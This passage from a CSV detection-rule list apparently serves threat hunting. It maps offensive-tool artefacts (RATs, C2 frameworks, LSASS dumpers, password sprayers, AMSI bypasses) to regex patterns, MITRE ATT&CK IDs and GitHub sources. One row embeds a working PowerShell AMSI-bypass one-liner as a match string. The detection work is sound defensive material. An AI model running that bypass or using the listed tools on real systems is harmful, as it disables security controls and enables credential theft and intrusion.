T1021.005 - T1021.003","TA0002 - TA0011 - TA0005 - TA0006 - TA0007","N/A","N/A","POST Exploitation tools","https://github.com/The-Viper-One/PsMapExec","1","0","N/A","10","7","661","80","2024-05-01T18:39:44Z","2023-06-20T16:57:27Z" "*Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed'*'NonPublic*Static').SetValue($null*$true)*",".{0,1000}Assembly\.GetType\(\'System\.Management\.Automation\.AmsiUtils\'\)\.GetField\(\'amsiInitFailed\'.{0,1000}\'NonPublic.{0,1000}Static\'\)\.SetValue\(\$null.{0,1000}\$true\).{0,1000}","offensive_tool_keyword","AD exploitation cheat sheet","PowerShell AMSI Bypass","T1548 T1562 T1027","N/A","N/A","N/A","Defense Evasion","https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*--assemblyargs AntiVirus AppLocker*",".{0,1000}\-\-assemblyargs\sAntiVirus\sAppLocker.{0,1000}","offensive_tool_keyword","seatbelt","Seatbelt is a comprehensive security scanning tool that can be used to perform a variety of checks. including but not limited to. user privileges. logged in users. network information. system information. and many others","T1012 - T1016 - T1033 - T1046 - T1049 - T1057 - T1069 - T1082 - T1083 - T1098 - T1105 - T1113 - T1135 - T1201 - T1518","TA0001 - TA0002 - TA0003 - TA0004 - TA0007 - TA0011","N/A","N/A","Persistence","https://github.com/GhostPack/Seatbelt","1","0","N/A","N/A","10","3485","648","2024-03-23T12:37:17Z","2018-07-24T17:38:51Z" "*Assets/solution/dllmain.cpp*",".{0,1000}Assets\/solution\/dllmain\.cpp.{0,1000}","offensive_tool_keyword","Spartacus","Spartacus DLL/COM Hijacking Toolkit","T1574.001 - T1055.001 - T1027.002","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/Accenture/Spartacus","1","1","N/A","10","10","947","121","2024-02-01T13:51:09Z","2022-10-28T09:00:35Z" "*AssmblyLoader*",".{0,1000}AssmblyLoader.{0,1000}","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","0","N/A","10","10","332","80","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" "*AsStrongAsFuck.exe*",".{0,1000}AsStrongAsFuck\.exe.{0,1000}","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1562.001 - T1059.003 - T1027.002 - T1070.004","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","1","N/A","10","10","1490","261","2023-11-03T09:33:21Z","2021-08-02T15:35:57Z" "*AsStrongAsFuck.py*",".{0,1000}AsStrongAsFuck\.py.{0,1000}","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1562.001 - T1059.003 - T1027.002 - T1070.004","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","1","N/A","10","10","1490","261","2023-11-03T09:33:21Z","2021-08-02T15:35:57Z" "*Async RDP Client. Duckyscript will be executed by pressing ESC 3 times*",".{0,1000}Async\sRDP\sClient\.\sDuckyscript\swill\sbe\sexecuted\sby\spressing\sESC\s3\stimes.{0,1000}","offensive_tool_keyword","evilrdp","Th evil twin of aardwolfgui using the aardwolf RDP client library that gives you extended control over the target and additional scripting capabilities from the command line.","T1021.001 - T1056.001 - T1113 - T1078.002 - T1105 - T1090.002 - T1059.001","TA0008 - TA0002 - TA0005 - TA0001 - TA0009 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/skelsec/evilrdp","1","0","N/A","10","10","267","30","2023-12-09T17:10:52Z","2023-11-29T13:44:58Z" "*async_webshell-all.py*",".{0,1000}async_webshell\-all\.py.{0,1000}","offensive_tool_keyword","scan4all","Official repository vuls Scan: 15000+PoCs - 23 kinds of application password crack - 7000+Web fingerprints - 146 protocols and 90000+ rules Port scanning - Fuzz - HW - awesome BugBounty","T1046 - T1210.001 - T1059 - T1082 - T1110","TA0007 - TA0001 - TA0009 - TA0002 - TA0004 - TA0011","N/A","N/A","Exploitation tools","https://github.com/hktalent/scan4all","1","1","N/A","10","10","5253","627","2024-03-13T23:03:35Z","2022-06-20T03:11:08Z" "*AsyncRAT Simple RAT*",".{0,1000}AsyncRAT\s\sSimple\sRAT.{0,1000}","offensive_tool_keyword","AsyncRAT-C-Sharp","Open-Source Remote Administration Tool For Windows C# (RAT)","T1021.002 - T1056.001 - T1113 - T1133 - T1041 - T1555 - T1129 - T1564.001","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009","N/A","N/A","C2","https://github.com/NYAN-x-CAT/AsyncRAT-C-Sharp","1","0","N/A","10","10","2110","708","2023-10-16T21:41:12Z","2019-01-19T04:02:26Z" "*AsyncRAT.exe*",".{0,1000}AsyncRAT\.exe.{0,1000}","offensive_tool_keyword","AsyncRAT-C-Sharp","Open-Source Remote Administration Tool For Windows C# (RAT)","T1021.002 - T1056.001 - T1113 - T1133 - T1041 - T1555 - T1129 - T1564.001","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009","N/A","N/A","C2","https://github.com/NYAN-x-CAT/AsyncRAT-C-Sharp","1","1","N/A","10","10","2110","708","2023-10-16T21:41:12Z","2019-01-19T04:02:26Z" "*AsyncRAT/DCRat*",".{0,1000}AsyncRAT\/DCRat.{0,1000}","offensive_tool_keyword","DcRat","DcRat C2 A simple remote tool in C#","T1071 - T1021 - T1003","TA0011","N/A","N/A","C2","https://github.com/qwqdanchun/DcRat","1","1","N/A","10","10","890","331","2022-02-07T05:37:09Z","2021-03-12T11:00:37Z" "*asyncssh_commander.py *",".{0,1000}asyncssh_commander\.py\s.{0,1000}","offensive_tool_keyword","MaccaroniC2","A proof-of-concept Command & Control framework that utilizes the powerful AsyncSSH Python library which provides an asynchronous client and server implementation of the SSHv2 protocol and use PyNgrok wrapper for ngrok integration.","T1090 - T1059.003","TA0011 - TA0002","N/A","N/A","C2","https://github.com/CalfCrusher/MaccaroniC2","1","1","N/A","10","10","73","12","2023-06-27T17:43:59Z","2023-05-21T13:33:48Z" "*asyncssh_commander.py*",".{0,1000}asyncssh_commander\.py.{0,1000}","offensive_tool_keyword","MaccaroniC2","A proof-of-concept Command & Control framework that utilizes the powerful AsyncSSH Python library which provides an asynchronous client and server implementation of the SSHv2 protocol and use PyNgrok wrapper for ngrok integration.","T1090 - T1059.003","TA0011 - TA0002","N/A","N/A","C2","https://github.com/CalfCrusher/MaccaroniC2","1","1","N/A","10","10","73","12","2023-06-27T17:43:59Z","2023-05-21T13:33:48Z" "*atexec.py*",".{0,1000}atexec\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","10","10","12711","3445","2024-04-29T12:46:57Z","2015-04-15T14:04:07Z" "*Athena.Forwarders.SMB*",".{0,1000}Athena\.Forwarders\.SMB.{0,1000}","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Athena","1","1","N/A","10","10","166","35","2024-04-25T14:30:04Z","2022-01-24T20:44:38Z" "*athena/agent_code/*",".{0,1000}athena\/agent_code\/.{0,1000}","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Athena","1","1","N/A","10","10","166","35","2024-04-25T14:30:04Z","2022-01-24T20:44:38Z" "*AthenaPlugins.csproj*",".{0,1000}AthenaPlugins\.csproj.{0,1000}","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Athena","1","1","N/A","10","10","166","35","2024-04-25T14:30:04Z","2022-01-24T20:44:38Z" "*AtlasC2*APIModels*",".{0,1000}AtlasC2.{0,1000}APIModels.{0,1000}","offensive_tool_keyword","AtlasC2","C# C2 Framework centered around Stage 1 operations","T1059 - T1078 - T1102 - T1105 - T1132 - T1136 - T1140 - T1204 - T1219 - T1543 - T1547 - T1553 - T1573 - T1574 - T1608","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0011","N/A","N/A","C2","https://github.com/Gr1mmie/AtlasC2","1","1","N/A","10","10","199","40","2022-04-04T16:16:15Z","2021-12-27T01:40:52Z" "*AtlasC2*Client*",".{0,1000}AtlasC2.{0,1000}Client.{0,1000}","offensive_tool_keyword","AtlasC2","C# C2 Framework centered around Stage 1 operations","T1059 - T1078 - T1102 - T1105 - T1132 - T1136 - T1140 - T1204 - T1219 - T1543 - T1547 - T1553 - T1573 - T1574 - T1608","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0011","N/A","N/A","C2","https://github.com/Gr1mmie/AtlasC2","1","1","N/A","10","10","199","40","2022-04-04T16:16:15Z","2021-12-27T01:40:52Z" "*AtlasC2*implant*",".{0,1000}AtlasC2.{0,1000}implant.{0,1000}","offensive_tool_keyword","AtlasC2","C# C2 Framework centered around Stage 1 operations","T1059 - T1078 - T1102 - T1105 - T1132 - T1136 - T1140 - T1204 - T1219 - T1543 - T1547 - T1553 - T1573 - T1574 - T1608","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0011","N/A","N/A","C2","https://github.com/Gr1mmie/AtlasC2","1","1","N/A","10","10","199","40","2022-04-04T16:16:15Z","2021-12-27T01:40:52Z" "*AtlasC2*TeamServer*",".{0,1000}AtlasC2.{0,1000}TeamServer.{0,1000}","offensive_tool_keyword","AtlasC2","C# C2 Framework centered around Stage 1 operations","T1059 - T1078 - T1102 - T1105 - T1132 - T1136 - T1140 - T1204 - T1219 - T1543 - T1547 - T1553 - T1573 - T1574 - T1608","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0011","N/A","N/A","C2","https://github.com/Gr1mmie/AtlasC2","1","1","N/A","10","10","199","40","2022-04-04T16:16:15Z","2021-12-27T01:40:52Z" "*AtlasC2.exe*",".{0,1000}AtlasC2\.exe.{0,1000}","offensive_tool_keyword","AtlasC2","C# C2 Framework centered around Stage 1 operations","T1059 - T1078 - T1102 - T1105 - T1132 - T1136 - T1140 - T1204 - T1219 - T1543 - T1547 - T1553 - T1573 - T1574 - T1608","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0011","N/A","N/A","C2","https://github.com/Gr1mmie/AtlasC2","1","1","N/A","10","10","199","40","2022-04-04T16:16:15Z","2021-12-27T01:40:52Z" "*AtlasC2b.exe*",".{0,1000}AtlasC2b\.exe.{0,1000}","offensive_tool_keyword","AtlasC2","C# C2 Framework centered around Stage 1 operations","T1059 - T1078 - T1102 - T1105 - T1132 - T1136 - T1140 - T1204 - T1219 - T1543 - T1547 - T1553 - T1573 - T1574 - T1608","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0011","N/A","N/A","C2","https://github.com/Gr1mmie/AtlasC2","1","1","N/A","10","10","199","40","2022-04-04T16:16:15Z","2021-12-27T01:40:52Z" "*AtlasC2b.sln*",".{0,1000}AtlasC2b\.sln.{0,1000}","offensive_tool_keyword","AtlasC2","C# C2 Framework centered around Stage 1 operations","T1059 - T1078 - T1102 - T1105 - T1132 - T1136 - T1140 - T1204 - T1219 - T1543 - T1547 - T1553 - T1573 - T1574 - T1608","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0011","N/A","N/A","C2","https://github.com/Gr1mmie/AtlasC2","1","1","N/A","10","10","199","40","2022-04-04T16:16:15Z","2021-12-27T01:40:52Z" "*AtlasImplant.yar*",".{0,1000}AtlasImplant\.yar.{0,1000}","offensive_tool_keyword","AtlasC2","C# C2 Framework centered around Stage 1 operations","T1059 - T1078 - T1102 - T1105 - T1132 - T1136 - T1140 - T1204 - T1219 - T1543 - T1547 - T1553 - T1573 - T1574 - T1608","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0011","N/A","N/A","C2","https://github.com/Gr1mmie/AtlasC2","1","1","N/A","10","10","199","40","2022-04-04T16:16:15Z","2021-12-27T01:40:52Z" "*AtlasReaper.exe*",".{0,1000}AtlasReaper\.exe.{0,1000}","offensive_tool_keyword","AtlasReaper","A command-line tool for reconnaissance and targeted write operations on Confluence and Jira instances.","T1210.002 - T1078.003 - T1046 ","TA0001 - TA0007 - TA0040","N/A","N/A","Reconnaissance","https://github.com/werdhaihai/AtlasReaper","1","1","N/A","3","3","232","26","2023-09-14T23:50:33Z","2023-06-24T00:18:41Z" "*AtlasReaper-main*",".{0,1000}AtlasReaper\-main.{0,1000}","offensive_tool_keyword","AtlasReaper","A command-line tool for reconnaissance and targeted write operations on Confluence and Jira instances.","T1210.002 - T1078.003 - T1046 ","TA0001 - TA0007 - TA0040","N/A","N/A","Reconnaissance","https://github.com/werdhaihai/AtlasReaper","1","1","N/A","3","3","232","26","2023-09-14T23:50:33Z","2023-06-24T00:18:41Z" "*atmail2john.pl*",".{0,1000}atmail2john\.pl.{0,1000}","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","9291","1993","2024-04-30T12:58:37Z","2011-12-16T19:43:47Z" "*atomizer imap *",".{0,1000}atomizer\simap\s.{0,1000}","offensive_tool_keyword","SprayingToolkit","Scripts to make password spraying attacks against Lync/S4B. OWA & O365 a lot quicker. less painful and more efficient","T1110 - T1078 - T1133 - T1061","TA0001 - TA0002 - TA0003","N/A","N/A","Credential Access","https://github.com/byt3bl33d3r/SprayingToolkit","1","0","N/A","10","10","1418","263","2022-10-17T01:01:57Z","2018-09-13T09:52:11Z" "*atomizer lync *",".{0,1000}atomizer\slync\s.{0,1000}","offensive_tool_keyword","SprayingToolkit","Scripts to make password spraying attacks against Lync/S4B. OWA & O365 a lot quicker. less painful and more efficient","T1110 - T1078 - T1133 - T1061","TA0001 - TA0002 - TA0003","N/A","N/A","Credential Access","https://github.com/byt3bl33d3r/SprayingToolkit","1","0","N/A","10","10","1418","263","2022-10-17T01:01:57Z","2018-09-13T09:52:11Z" "*atomizer owa *",".{0,1000}atomizer\sowa\s.{0,1000}","offensive_tool_keyword","SprayingToolkit","Scripts to make password spraying attacks against Lync/S4B. OWA & O365 a lot quicker. less painful and more efficient","T1110 - T1078 - T1133 - T1061","TA0001 - TA0002 - TA0003","N/A","N/A","Credential Access","https://github.com/byt3bl33d3r/SprayingToolkit","1","0","N/A","10","10","1418","263","2022-10-17T01:01:57Z","2018-09-13T09:52:11Z" "*atomizer.py -*",".{0,1000}atomizer\.py\s\-.{0,1000}","offensive_tool_keyword","SprayingToolkit","Scripts to make password spraying attacks against Lync/S4B. OWA & O365 a lot quicker. less painful and more efficient","T1110 - T1078 - T1133 - T1061","TA0001 - TA0002 - TA0003","N/A","N/A","Credential Access","https://github.com/byt3bl33d3r/SprayingToolkit","1","0","N/A","10","10","1418","263","2022-10-17T01:01:57Z","2018-09-13T09:52:11Z" "*atomizer.py imap *",".{0,1000}atomizer\.py\simap\s.{0,1000}","offensive_tool_keyword","SprayingToolkit","Scripts to make password spraying attacks against Lync/S4B. OWA & O365 a lot quicker. less painful and more efficient","T1110 - T1078 - T1133 - T1061","TA0001 - TA0002 - TA0003","N/A","N/A","Credential Access","https://github.com/byt3bl33d3r/SprayingToolkit","1","0","N/A","10","10","1418","263","2022-10-17T01:01:57Z","2018-09-13T09:52:11Z" "*atomizer.py lync *",".{0,1000}atomizer\.py\slync\s.{0,1000}","offensive_tool_keyword","SprayingToolkit","Scripts to make password spraying attacks against Lync/S4B. OWA & O365 a lot quicker. less painful and more efficient","T1110 - T1078 - T1133 - T1061","TA0001 - TA0002 - TA0003","N/A","N/A","Credential Access","https://github.com/byt3bl33d3r/SprayingToolkit","1","0","N/A","10","10","1418","263","2022-10-17T01:01:57Z","2018-09-13T09:52:11Z" "*atomizer.py owa *",".{0,1000}atomizer\.py\sowa\s.{0,1000}","offensive_tool_keyword","SprayingToolkit","Scripts to make password spraying attacks against Lync/S4B. OWA & O365 a lot quicker. less painful and more efficient","T1110 - T1078 - T1133 - T1061","TA0001 - TA0002 - TA0003","N/A","N/A","Credential Access","https://github.com/byt3bl33d3r/SprayingToolkit","1","0","N/A","10","10","1418","263","2022-10-17T01:01:57Z","2018-09-13T09:52:11Z" "*AtomLdr.dll*",".{0,1000}AtomLdr\.dll.{0,1000}","offensive_tool_keyword","AtomLdr","A DLL loader with advanced evasive features","T1071.004 - T1574.001 - T1574.002 - T1071.001 - T1055.003 - T1059.003 - T1546.003 - T1574.003 - T1574.004 - T1059.001 - T1569.002","TA0011 - TA0006 - TA0002 - TA0008 - TA0007","N/A","N/A","Exploitation tools","https://github.com/NUL0x4C/AtomLdr","1","1","N/A","N/A","6","599","83","2023-02-26T19:57:09Z","2023-02-26T17:59:26Z" "*AtomLdr.sln*",".{0,1000}AtomLdr\.sln.{0,1000}","offensive_tool_keyword","AtomLdr","A DLL loader with advanced evasive features","T1071.004 - T1574.001 - T1574.002 - T1071.001 - T1055.003 - T1059.003 - T1546.003 - T1574.003 - T1574.004 - T1059.001 - T1569.002","TA0011 - TA0006 - TA0002 - TA0008 - TA0007","N/A","N/A","Exploitation tools","https://github.com/NUL0x4C/AtomLdr","1","1","N/A","N/A","6","599","83","2023-02-26T19:57:09Z","2023-02-26T17:59:26Z" "*AtomLdr.vcxproj*",".{0,1000}AtomLdr\.vcxproj.{0,1000}","offensive_tool_keyword","AtomLdr","A DLL loader with advanced evasive features","T1071.004 - T1574.001 - T1574.002 - T1071.001 - T1055.003 - T1059.003 - T1546.003 - T1574.003 - T1574.004 - T1059.001 - T1569.002","TA0011 - TA0006 - TA0002 - TA0008 - TA0007","N/A","N/A","Exploitation tools","https://github.com/NUL0x4C/AtomLdr","1","1","N/A","N/A","6","599","83","2023-02-26T19:57:09Z","2023-02-26T17:59:26Z" "*AtomLdr-main.zip*",".{0,1000}AtomLdr\-main\.zip.{0,1000}","offensive_tool_keyword","AtomLdr","A DLL loader with advanced evasive features","T1071.004 - T1574.001 - T1574.002 - T1071.001 - T1055.003 - T1059.003 - T1546.003 - T1574.003 - T1574.004 - T1059.001 - T1569.002","TA0011 - TA0006 - TA0002 - TA0008 - TA0007","N/A","N/A","Exploitation tools","https://github.com/NUL0x4C/AtomLdr","1","1","N/A","N/A","6","599","83","2023-02-26T19:57:09Z","2023-02-26T17:59:26Z" "*ATPMiniDump*",".{0,1000}ATPMiniDump.{0,1000}","offensive_tool_keyword","ATPMiniDump","Dumping LSASS memory with MiniDumpWriteDump on PssCaptureSnapShot to evade WinDefender ATP credential-theft. Take a look at this blog post for details. ATPMiniDump was created starting from Outflank-Dumpert then big credits to @Cneelis","T1003 - T1005 - T1055 - T1218","TA0006 - TA0008 - TA0011","N/A","N/A","Credential Access","https://github.com/b4rtik/ATPMiniDump","1","1","N/A","N/A","3","254","48","2019-12-02T15:01:22Z","2019-11-29T19:49:54Z" "*--attack nightmare*",".{0,1000}\-\-attack\snightmare.{0,1000}","offensive_tool_keyword","spoolsploit","A collection of Windows print spooler exploits containerized with other utilities for practical exploitation.","T1204 - T1547 - T1562 - T1003 - T1018 - T1570 - T1005","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009","N/A","N/A","Exploitation tools","https://github.com/BeetleChunks/SpoolSploit","1","0","N/A","N/A","6","545","93","2021-07-16T04:49:43Z","2021-07-07T00:32:28Z" "*--attack spoolsample*",".{0,1000}\-\-attack\sspoolsample.{0,1000}","offensive_tool_keyword","spoolsploit","A collection of Windows print spooler exploits containerized with other utilities for practical exploitation.","T1204 - T1547 - T1562 - T1003 - T1018 - T1570 - T1005","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009","N/A","N/A","Exploitation tools","https://github.com/BeetleChunks/SpoolSploit","1","0","N/A","N/A","6","545","93","2021-07-16T04:49:43Z","2021-07-07T00:32:28Z" "*Attack_AmsiOpenSession.ps1*",".{0,1000}Attack_AmsiOpenSession\.ps1.{0,1000}","offensive_tool_keyword","Amsi_Bypass","Amsi Bypass payload that works on Windwos 11","T1055 - T1055.012 - T1562 - T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/senzee1984/Amsi_Bypass_In_2023","1","1","N/A","8","4","350","63","2023-07-30T19:17:23Z","2023-07-30T16:14:19Z" "*Attack_AmsiScanBuffer.ps1*",".{0,1000}Attack_AmsiScanBuffer\.ps1.{0,1000}","offensive_tool_keyword","Amsi_Bypass","Amsi Bypass payload that works on Windwos 11","T1055 - T1055.012 - T1562 - T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/senzee1984/Amsi_Bypass_In_2023","1","1","N/A","8","4","350","63","2023-07-30T19:17:23Z","2023-07-30T16:14:19Z" "*--attacker-page *",".{0,1000}\-\-attacker\-page\s.{0,1000}","offensive_tool_keyword","PrivExchange","Exchange your privileges for Domain Admin privs by abusing Exchange","T1091.001 - T1101 - T1201 - T1570","TA0006","N/A","N/A","Exploitation tools","https://github.com/dirkjanm/PrivExchange","1","0","N/A","N/A","10","947","174","2020-01-23T19:48:51Z","2019-01-21T17:39:47Z" "*AttackerSetup(windows).exe*",".{0,1000}AttackerSetup\(windows\)\.exe.{0,1000}","offensive_tool_keyword","windows-login-phish","Windows Login Phishing page This is a windows maching login page designed using HTML CSS and JS. This can be used for red teaming or cybersecurity awareness related purposes","T1566","N/A","N/A","N/A","Phishing","https://github.com/CipherKill/windows-login-phish","1","1","N/A","N/A","1","18","6","2022-03-25T05:49:01Z","2022-03-13T20:02:15Z" "*AttackerSetup.py*",".{0,1000}AttackerSetup\.py.{0,1000}","offensive_tool_keyword","windows-login-phish","Windows Login Phishing page This is a windows maching login page designed using HTML CSS and JS. This can be used for red teaming or cybersecurity awareness related purposes","T1566","N/A","N/A","N/A","Phishing","https://github.com/CipherKill/windows-login-phish","1","1","N/A","N/A","1","18","6","2022-03-25T05:49:01Z","2022-03-13T20:02:15Z" "*AttackerSetup4linux*",".{0,1000}AttackerSetup4linux.{0,1000}","offensive_tool_keyword","windows-login-phish","Windows Login Phishing page This is a windows maching login page designed using HTML CSS and JS. This can be used for red teaming or cybersecurity awareness related purposes","T1566","N/A","N/A","N/A","Phishing","https://github.com/CipherKill/windows-login-phish","1","1","N/A","N/A","1","18","6","2022-03-25T05:49:01Z","2022-03-13T20:02:15Z" "*Attacking domain controller *",".{0,1000}Attacking\sdomain\scontroller\s.{0,1000}","offensive_tool_keyword","Slackor","A Golang implant that uses Slack as a command and control server","T1059.003 - T1071.004 - T1562.001","TA0002 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Coalfire-Research/Slackor","1","0","N/A","10","10","454","111","2023-02-25T03:35:15Z","2019-06-18T16:01:37Z" "*AttackSurfaceMapper-master*",".{0,1000}AttackSurfaceMapper\-master.{0,1000}","offensive_tool_keyword","AttackSurfaceMapper","AttackSurfaceMapper (ASM) is a reconnaissance tool that uses a mixture of open source intelligence and active techniques to expand the attack surface of your target","T1595 - T1596","TA0043","N/A","N/A","Reconnaissance","https://github.com/superhedgy/AttackSurfaceMapper","1","1","N/A","6","10","1271","193","2024-04-08T16:13:24Z","2019-08-07T14:32:53Z" "*AttackTeamFamily*-bof-toolset*",".{0,1000}AttackTeamFamily.{0,1000}\-bof\-toolset.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/AttackTeamFamily/cobaltstrike-bof-toolset","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*Attempted to spawn a socks proxy server at 0.0.0.0:*",".{0,1000}Attempted\sto\sspawn\sa\ssocks\sproxy\sserver\sat\s0\.0\.0\.0\:.{0,1000}","offensive_tool_keyword","CSExec","An alternative to *exec.py from impacket with some builtin tricks","T1059.001 - T1059.005 - T1071.001","TA0002","N/A","N/A","Lateral Movement","https://github.com/Metro-Holografix/CSExec.py","1","0","private github repo","10","N/A","N/A","N/A","N/A","N/A" "*Attempting connection from 0.0.0.0:*",".{0,1000}Attempting\sconnection\sfrom\s0\.0\.0\.0\:.{0,1000}","offensive_tool_keyword","EQGRP tools","Equation Group hack tool leaked by ShadowBrokers- file noclient CNC server for NOPEN*","T1053 - T1064 - T1059 - T1218","TA0002 - TA0007","N/A","N/A","Shell spawning","https://github.com/x0rz/EQGRP/blob/master/Linux/bin/noclient-3.3.2.3-linux-i386","1","0","N/A","N/A","10","4071","2067","2017-05-24T21:12:59Z","2017-04-08T14:03:59Z" "*Attempting Risky Operation: Opening Handle Directly to Lsass Process*",".{0,1000}Attempting\sRisky\sOperation\:\sOpening\sHandle\sDirectly\sto\sLsass\sProcess.{0,1000}","offensive_tool_keyword","EvilLsassTwin","Dumping lsass","T1003 - T1560.001 - T1022 - T1027.002","TA0005 - TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/RePRGM/Nimperiments/tree/main/EvilLsassTwin","1","0","N/A","10","2","129","15","2024-04-19T15:15:35Z","2022-09-13T12:42:13Z" "*Attempting to add Sticky Keys backdoor to registry*",".{0,1000}Attempting\sto\sadd\sSticky\sKeys\sbackdoor\sto\sregistry.{0,1000}","offensive_tool_keyword","Persistence-Accessibility-Features","automated sticky keys backdoor","T1174 - T1078 - T1546.013","TA0003","N/A","N/A","Persistence","https://github.com/Ignitetechnologies/Persistence-Accessibility-Features","1","0","N/A","9","1","26","7","2020-05-18T05:59:58Z","2020-05-18T05:59:23Z" "*Attempting to add Sticky Keys backdoor to registry*",".{0,1000}Attempting\sto\sadd\sSticky\sKeys\sbackdoor\sto\sregistry.{0,1000}","offensive_tool_keyword","Persistence-Accessibility-Features","automated sticky keys backdoor","T1174 - T1078 - T1546.013","TA0003","N/A","N/A","Persistence","https://github.com/Ignitetechnologies/Persistence-Accessibility-Features","1","0","N/A","9","1","26","7","2020-05-18T05:59:58Z","2020-05-18T05:59:23Z" "*AttifyOS*",".{0,1000}AttifyOS.{0,1000}","offensive_tool_keyword","attifyos","AttifyOS is a distro intended to help you perform security assessment and penetration testing of Internet of Things (IoT) devices. It saves you a lot of time by providing a pre-configured environment with all the necessary tools loaded. The new version is based on Ubuntu 18.04 64-Bit - that also means that you'll receive updates for this version till April 2023.","T1559 - T1565 - T1210 - T1189 - T1110","TA0002 - TA0003 - TA0008","N/A","N/A","Exploitation tools","https://github.com/adi0x90/attifyos","1","0","N/A","N/A","10","923","162","2021-08-26T13:31:13Z","2017-07-17T01:40:25Z" "*Auditcleaner.*",".{0,1000}Auditcleaner\..{0,1000}","offensive_tool_keyword","EQGRP tools","Equation Group hack tool leaked by ShadowBrokers anti forensic - cleans up audit.log","T1055 - T1036 - T1038 - T1203 - T1059","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/Artogn/EQGRP-1/blob/master/Linux/bin/Auditcleaner","1","0","N/A","N/A","1","1","1","2017-04-10T05:02:35Z","2017-04-10T06:59:29Z" "*Augustus-main.zip*",".{0,1000}Augustus\-main\.zip.{0,1000}","offensive_tool_keyword","Augustus","Augustus is a Golang loader that execute shellcode utilizing the process hollowing technique with anti-sandbox and anti-analysis 